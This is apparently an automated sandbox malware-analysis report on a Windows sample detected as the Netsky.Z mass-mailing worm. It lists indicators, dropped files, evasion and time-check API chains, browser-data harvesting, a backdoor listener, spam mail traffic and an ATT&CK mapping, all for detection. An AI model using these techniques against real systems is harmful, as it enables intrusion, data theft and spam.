Edit tour

Windows Analysis Report
.exe

Overview

General Information

Sample Name:	.exe
Original Sample Name:	Important.txt .exe
Analysis ID:	811855
MD5:	a3b23357f518a7b2f8180585d512df94
SHA1:	07926a2239463879fda1d3bb071bc37f3715072b
SHA256:	77914ecc60f5bea2153e6c6d8a148742902af5c160eb01ee2e92aca05802a225
Tags:	exe
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Found evasive API chain (may stop execution after checking mutex)

PE file has a writeable .text section

Machine Learning detection for sample

Send many emails (e-Mail Spam)

Machine Learning detection for dropped file

Tries to resolve many domain names, but no domain seems valid

Drops executables to the windows directory (C:\Windows) and starts them

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Creates files inside the system directory

PE file contains sections with non-standard names

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Uses the system / local time for branch decision (may execute only at specific dates)

IP address seen in connection with other malware

Connects to many different domains

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Uses SMTP (mail sending)

Classification

Process Tree

System is w10x64

.exe (PID: 5648 cmdline: C:\Users\user\Desktop\ .exe MD5: A3B23357F518A7B2F8180585D512DF94)

Jammer2nd.exe (PID: 4740 cmdline: "C:\Windows\Jammer2nd.exe" MD5: A3B23357F518A7B2F8180585D512DF94)

cleanup

HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061340710069592X-DeviceID: 0100748C0900F045X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Agent-DeviceId: 0100748C0900F045X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAATGOjhyCBrEl1Awji/g7SRpxfRm6uWBRuknppntx4OiUWhXYc4%2B3VQnWDF1be33N1ghsq3j4YMAI/YDUY38tMDQIa0safxbjvckEvW4tNqBM1O4tKr8hfvcKDOdVm5hOMuYmheSrgvEMOdpMN3JcqX5ZBSUZe4n9Mmx6YOtZo48C5mjJh%2Bzx42WFFIOLDIsKQmst1kJcfpJufkc0ZX4mGVgSQ3X%2BJNyj779EzrVHCPzqC9eEVVLpIgcQYH8VU5MPtC58KC2FM2gsmwePhmSBv5sAa35vDVSISQeT7PeFAb6eSz6jRU44rclCl9/zWgC2fmbvB5IeckE0QQ6uFneWYVsDZgAACNQSEqqyOT5iqAH5MRxWMYLqTyO2njozjedhAQ7YM0I82pzzoXTQ6tg332TSA2bDgR6Njn%2BNsmaq46AFimVMA5PShcvlHPpo7GqVeEWUtUledDOHejewOg/eCCo62oigQWy6B5/%2BH5Ce8OaZ1S6C/io7kvSaiD5Ggnb5dJowaWVfqx5x8e1c1YLcq5ezMB5IHUKhZINnTjvxvvUH%2BApHhRlENBwpIz5nN3v0OvdBVXAyrr2lQ9wYKsxTBreDU52epgCfgBSzvic6nyceUMT2G8cKJ5ad1FGZ0AGzleGhsX45QvQVBQRKiJ30E1rd22y7nZSTEXt%2BPT2h9dFP1MWr2kPCdqhXX5DGqUsvUXfxYG4qE93TMRMWuyg4MFCpWOYN5YxP85QjHsTwM9g6pblWpt4UQvxcD9d6sohVPA1Ammt8L5wtebIFFZptYU41hWJqpCZVQSwkefgUS2PpUd9EGRiPJbh1K2bkIv/0erBIrXPhhiVeyO%2BjCWNR0ltJADhqhNpuC32hi2A8k3%2BHrhg7cXM1Yx11gfh7OnF37PsvK6keCy0L94WbIS2ZOUSG33rPdEQv1gE%3D%26p%3DX-BM-CBT: 1660688483X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: A093DD4137F64C659186F72CE611649CX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 86635Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=0BA1234E3B2140EBA8746E9F98F8CAA3; _SS=CPID=1660688519156&AC=1&CPH=4ef661f2&HV=1660688519

Source: unknown

DNS traffic detected: queries for: yahoo.com

Source: C:\Users\user\Desktop\ .exe

Code function: 0_2_00402CD3 socket,htons,bind,closesocket,listen,closesocket,recv,_hwrite,accept,wsprintfA,_lopen,recv,_hwrite,WinExec,_lclose,closesocket,Sleep,

0_2_00402CD3

Source: unknown	HTTPS traffic detected: 20.90.156.32:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.90.152.133:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.90.156.32:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.90.156.32:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.90.156.32:443 -> 192.168.2.5:49783 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Send many emails (e-Mail Spam)

Source: SMTP

Network traffic detected: Mail traffic on many different IPs 36

System Summary

PE file has a writeable .text section

Source: .exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Jammer2nd.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: .exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\ .exe

File created: C:\Windows\Jammer2nd.exe

Jump to behavior

Source: C:\Users\user\Desktop\ .exe

Code function: 0_2_00401691

0_2_00401691

Source: C:\Users\user\Desktop\ .exe

Process Stats: CPU usage > 98%

Source: .exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Jammer2nd.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: .exe	Static PE information: Section: .mjg ZLIB complexity 9.0
Source: Jammer2nd.exe.0.dr	Static PE information: Section: .mjg ZLIB complexity 9.0

Source: .exe

ReversingLabs: Detection: 94%

Source: C:\Users\user\Desktop\ .exe

File read: C:\Users\user\Desktop\ .exe

Jump to behavior

Source: C:\Users\user\Desktop\ .exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ .exe C:\Users\user\Desktop\ .exe
Source: unknown	Process created: C:\Windows\Jammer2nd.exe "C:\Windows\Jammer2nd.exe"

Source: C:\Users\user\Desktop\ .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@2/11@439/40

Source: C:\Users\user\Desktop\ .exe

Mutant created: \Sessions\1\BaseNamedObjects\(S)(k)(y)(N)(e)(t)

Source: .exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: C:\Users\user\Desktop\ .exe

Code function: 0_2_00403BF0 push eax; ret

0_2_00403C1E

Source: .exe	Static PE information: section name: .mjg
Source: Jammer2nd.exe.0.dr	Static PE information: section name: .mjg

Source: C:\Users\user\Desktop\ .exe

Code function: 0_3_005E03F5 LoadLibraryA,GetProcAddress,

0_3_005E03F5

Source: initial sample	Static PE information: section name: .text entropy: 7.84639890253536
Source: initial sample	Static PE information: section name: .text entropy: 7.84639890253536

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown

Executable created and started: C:\Windows\Jammer2nd.exe

Source: C:\Users\user\Desktop\ .exe

File created: C:\Windows\Jammer2nd.exe

Jump to dropped file

Source: C:\Users\user\Desktop\ .exe

File created: C:\Windows\Jammer2nd.exe

Jump to dropped file

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\ .exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-2354

Source: C:\Users\user\Desktop\ .exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-2722

Source: C:\Users\user\Desktop\ .exe TID: 3308	Thread sleep count: 81 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ .exe TID: 3308	Thread sleep count: 872 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ .exe TID: 3308	Thread sleep time: -43600s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ .exe TID: 5652	Thread sleep count: 62 > 30	Jump to behavior

Source: C:\Users\user\Desktop\ .exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-2376

Source: C:\Users\user\Desktop\ .exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\ .exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ .exe	Code function: 0_2_00402DE3 GetLocalTime followed by cmp: cmp word ptr [ebp-0eh], 0001h and CTI: jbe 00402F80h	0_2_00402DE3
Source: C:\Users\user\Desktop\ .exe	Code function: 0_2_00402DE3 GetLocalTime followed by cmp: cmp word ptr [ebp-0eh], 0006h and CTI: jnc 00402F80h	0_2_00402DE3
Source: C:\Users\user\Desktop\ .exe	Code function: 0_2_00402DE3 GetLocalTime followed by cmp: cmp word ptr [ebp-12h], 0005h and CTI: jne 00402F80h	0_2_00402DE3
Source: C:\Users\user\Desktop\ .exe	Code function: 0_2_00402DE3 GetLocalTime followed by cmp: cmp word ptr [ebp-14h], 07d4h and CTI: jne 00402F80h	0_2_00402DE3
Source: C:\Users\user\Desktop\ .exe	Code function: 0_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-10h], 07dah and CTI: jbe 00401A0Eh	0_2_004019E8
Source: C:\Users\user\Desktop\ .exe	Code function: 0_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-0eh], 0001h and CTI: jc 00401A1Ch	0_2_004019E8
Source: C:\Users\user\Desktop\ .exe	Code function: 0_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-0eh], 000ch and CTI: jbe 00401A22h	0_2_004019E8
Source: C:\Users\user\Desktop\ .exe	Code function: 0_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-0ah], 0001h and CTI: jc 00401A30h	0_2_004019E8
Source: C:\Users\user\Desktop\ .exe	Code function: 0_2_004019E8 GetSystemTime followed by cmp: cmp word ptr [ebp-0ah], 001fh and CTI: jbe 00401A36h	0_2_004019E8

Source: C:\Users\user\Desktop\ .exe

Window / User API: threadDelayed 872

Jump to behavior

Source: C:\Users\user\Desktop\ .exe

Code function: 0_2_00402100 FindFirstFileA,CharLowerBuffA,FindNextFileA,FindClose,

0_2_00402100

Source: C:\Users\user\Desktop\ .exe

API call chain: ExitProcess graph end node

graph_0-2842

Source: pk_zip7.log.0.dr

Binary or memory string: 9RWCJUFyGcYEWs6qS6DIgMHGfS2ISZYfGAthchMEBXp3DqlOwB3pIOvgtUw8Sr40XslqhgwS

Source: C:\Users\user\Desktop\ .exe

Code function: 0_3_005E03F5 LoadLibraryA,GetProcAddress,

0_3_005E03F5

Source: C:\Users\user\Desktop\ .exe

Code function: 0_2_00402DE3 GetTickCount,CreateMutexA,GetLastError,CreateThread,CreateThread,CreateThread,GetLocalTime,CreateThread,Sleep,CreateThread,Sleep,Sleep,

0_2_00402DE3

Source: C:\Users\user\Desktop\ .exe

Code function: 0_2_00402797 GetLocalTime,GetTimeZoneInformation,wsprintfA,

0_2_00402797

Source: C:\Users\user\Desktop\ .exe

Code function: 0_2_00403E5F EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,

0_2_00403E5F

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\chrome_shutdown_ms.txt	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\google\chrome\user data\default\databases\databases.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\google\chrome\user data\default\previews_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\chrome_shutdown_ms.txt	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\google\chrome\user data\chrome_shutdown_ms.txt	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\google\chrome\user data\chrome_shutdown_ms.txt	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\default\previews_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\google\chrome\user data\default\databases\databases.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\google\chrome\user data\default\heavy_ad_intervention_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\google\chrome\user data\default\heavy_ad_intervention_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\google\chrome\user data\default\previews_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\default\databases\databases.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\google\chrome\user data\chrome_shutdown_ms.txt	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\default\previews_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\google\chrome\user data\default\databases\databases.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\default\databases\databases.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\google\chrome\user data\default\heavy_ad_intervention_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\default\heavy_ad_intervention_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\google\chrome\user data\chrome_shutdown_ms.txt	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\default\previews_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\google\chrome\user data\default\previews_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\default\databases\databases.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\google\chrome\user data\default\databases\databases.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\google\chrome\user data\default\previews_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\chrome_shutdown_ms.txt	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\google\chrome\user data\default\heavy_ad_intervention_opt_out.db	Jump to behavior
Source: C:\Users\user\Desktop\ .exe	File opened: c:\documents and settings\user\appdata\local\application data\application data\application data\google\chrome\user data\default\heavy_ad_intervention_opt_out.db	Jump to behavior

Source: C:\Users\user\Desktop\ .exe

Code function: 0_2_00402CD3 socket,htons,bind,closesocket,listen,closesocket,recv,_hwrite,accept,wsprintfA,_lopen,recv,_hwrite,WinExec,_lclose,closesocket,Sleep,

0_2_00402CD3

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Native API	Path Interception	1 Process Injection	12 Masquerading	1 OS Credential Dumping	12 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Virtualization/Sandbox Evasion	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	4 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	23 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	3 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
.exe	95%	ReversingLabs	Win32.Worm.NetSky
.exe	100%	Avira	WORM/Netsky.Z
.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\Jammer2nd.exe	100%	Avira	WORM/Netsky.Z
C:\Windows\Jammer2nd.exe	100%	Joe Sandbox ML
C:\Windows\Jammer2nd.exe	95%	ReversingLabs	Win32.Worm.NetSky

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2. .exe.400000.0.unpack	100%	Avira	TR/Crypt.CFI.Gen	Download File
0.0. .exe.400000.0.unpack	100%	Avira	WORM/Netsky.Z	Download File
1.2.Jammer2nd.exe.400000.0.unpack	100%	Avira	TR/Crypt.CFI.Gen	Download File
1.0.Jammer2nd.exe.400000.0.unpack	100%	Avira	WORM/Netsky.Z	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.m	0%	URL Reputation	safe
http://www.adobe.	0%	URL Reputation	safe
https://wallet.microsoft-ppe.com	0%	Avira URL Cloud	safe
http://www.domini.cat/~anna_maria/	0%	Avira URL Cloud	safe
http://scottmuc.com/blog/development/powershell-bdd-testing-pester-screencast/)	0%	Avira URL Cloud	safe
https://xbox-pay-test.com/	0%	Avira URL Cloud	safe
http://scottmuc.com/blog/development/pester-bdd-for-the-system-administrator/)	0%	Avira URL Cloud	safe
https://xbox-pay.chinatvpay.com/	0%	Avira URL Cloud	safe
https://accounts.google.cX	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
silly.haxx.se	159.253.31.95	true	false	high
ismtp.sitestar.everyone.net	64.29.151.236	true	false	high
mx1.riseup.net	198.252.153.129	true	false	high
mx01.earthlink-vadesecure.net	51.81.61.70	true	false	unknown
pb-mx11.pobox.com	64.147.108.52	true	false	high
incoming-relays.illinois.edu	148.163.139.28	true	false	high
ma-01.vlada.hr	195.29.173.138	true	false	unknown
adobe-com.mail.protection.outlook.com	104.47.73.10	true	false	high
mxb-00377f01.gslb.pphosted.com	185.132.181.97	true	false	high
mxs.mail.ru	94.100.180.31	true	false	high
mail.dva.hr	178.218.165.214	true	false	unknown
gmail-smtp-in.l.google.com	142.250.27.27	true	false	high
alumni-caltech-edu.mail.protection.outlook.com	104.47.66.10	true	false	high
mx-aol.mail.gm0.yahoodns.net	67.195.228.86	true	false	unknown
mx.cam.ac.uk	131.111.8.146	true	false	unknown
linuxnet.com	153.127.71.68	true	false	unknown
mail3.edvz.uni-linz.ac.at	140.78.3.83	true	false	unknown
mta6.am0.yahoodns.net	98.136.96.91	true	false	unknown
vub-ac-be.mail.protection.outlook.com	104.47.0.36	true	false	high
mail.h-email.net	165.227.159.144	true	false	unknown
mx.leonet.it	212.19.106.223	true	false	unknown
onlineconnections.com.au	192.254.190.168	true	false	unknown
abc-org.mail.protection.outlook.com	104.47.57.110	true	false	high
gzip.org	85.187.148.2	true	false	unknown
mail.fabrikam.com	131.107.55.31	true	false	unknown
mx1c50.megamailservers.eu	91.136.8.41	true	false	unknown
mx2.mailchannels.net	44.238.161.41	true	false	high
mail.adatum.com	131.107.88.24	true	false	unknown
smx01.a1.net	80.75.42.227	true	false	high
msn-com.olc.protection.outlook.com	104.47.22.161	true	false	high
microsoft-com.mail.protection.outlook.com	40.93.212.0	true	false	high
blackhole.aftermarket.pl	185.253.212.68	true	false	high
contoso-com.mail.protection.outlook.com	104.47.57.110	true	false	high
autoitscript-com.mail.protection.outlook.com	104.47.11.202	true	false	high
eggs.gnu.org	209.51.188.92	true	false	high
smtp.litwareinc.com	96.47.154.206	true	false	unknown
aspmx.l.google.com	142.250.27.26	true	false	high
ppp.ro	unknown	unknown	true	unknown
fanfary.pq	unknown	unknown	true	unknown
example.mx	unknown	unknown	true	unknown
example.es	unknown	unknown	true	unknown
dva.hr	unknown	unknown	true	unknown
yahoo.com	unknown	unknown	false	high
fb.cz	unknown	unknown	true	unknown
tek-astore.cz	unknown	unknown	true	unknown
nongnu.org	unknown	unknown	false	high
fajrant.qz	unknown	unknown	true	unknown
pobox.com	unknown	unknown	false	high
griepp.pl	unknown	unknown	true	unknown
xara.pl	unknown	unknown	true	unknown
fafa.pk	unknown	unknown	true	unknown
contoso.mx	unknown	unknown	true	unknown
contoso.es	unknown	unknown	true	unknown
aol.com	unknown	unknown	false	high
theriver.com	unknown	unknown	true	unknown
haxx.se	unknown	unknown	false	high
netcom.com	unknown	unknown	true	unknown
contoso.com	unknown	unknown	true	unknown
oopp.pl	unknown	unknown	true	unknown
abc.org	unknown	unknown	false	high
jk.uni-linz.ac.at	unknown	unknown	true	unknown
mail.ru	unknown	unknown	false	high
animo.br	unknown	unknown	true	unknown
autoitscript.com	unknown	unknown	false	high
uiuc.edu	unknown	unknown	false	high
xyz.com.br	unknown	unknown	true	unknown
quatro.br	unknown	unknown	true	unknown
abcdefg.cz	unknown	unknown	true	unknown
msn.com	unknown	unknown	false	high
somemail.ro	unknown	unknown	true	unknown
riseup.net	unknown	unknown	false	high
bryson.demon.co.uk	unknown	unknown	true	unknown
mx2-lw-eu.apache.org	unknown	unknown	false	high
au.au-net.ne.jp	unknown	unknown	true	unknown
northcoast.com	unknown	unknown	true	unknown
alumni.caltech.edu	unknown	unknown	false	high
telering.at	unknown	unknown	false	high
ektro.cz	unknown	unknown	true	unknown
tvrtka.hr	unknown	unknown	true	unknown
cl.cam.ac.uk	unknown	unknown	true	unknown
vlada.hr	unknown	unknown	true	unknown
pirajui.br	unknown	unknown	true	unknown
fabrikam.com	unknown	unknown	true	unknown
kinoho.net	unknown	unknown	true	unknown
xyz.com	unknown	unknown	true	unknown
src.dec.com	unknown	unknown	true	unknown
a1plus.at	unknown	unknown	true	unknown
musical.com.br	unknown	unknown	true	unknown
cryptsoft.com	unknown	unknown	true	unknown
emaiserver.ro	unknown	unknown	true	unknown
orice.com	unknown	unknown	true	unknown
lufka.zx	unknown	unknown	true	unknown
adatum.com	unknown	unknown	true	unknown
litwareinc.com	unknown	unknown	true	unknown
contoso.com.br	unknown	unknown	true	unknown
wewew.pl	unknown	unknown	true	unknown
worldwideoffices.ro	unknown	unknown	true	unknown
negdje.hr	unknown	unknown	true	unknown
netko.hr	unknown	unknown	true	unknown
openoffice.org	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/license-2.0	.exe, 00000000.00000003.480690386.00000000008E8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://xbox-pay-test.com/	.exe, 00000000.00000003.546960080.0000000000814000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.558540476.0000000000814000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.549795782.0000000000814000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.554113149.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.m	.exe, 00000000.00000003.525896094.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.525307808.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.524894550.000000000086C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://scottmuc.com/blog/development/powershell-bdd-testing-pester-screencast/)	.exe, 00000000.00000003.488102508.000000000086C000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.487995373.000000000089F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live-int.com/inlinesignup.aspx?iww=1&id=80603	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live-int.com/inlinesignup.aspx?iww=1&id=80604	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live-int.com/inlinesignup.aspx?iww=1&id=80605	.exe, 00000000.00000003.489336656.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000000.00000003.489314189.00000000008E4000.00000004.00000020.00020000.00000000.sdmp	false		high
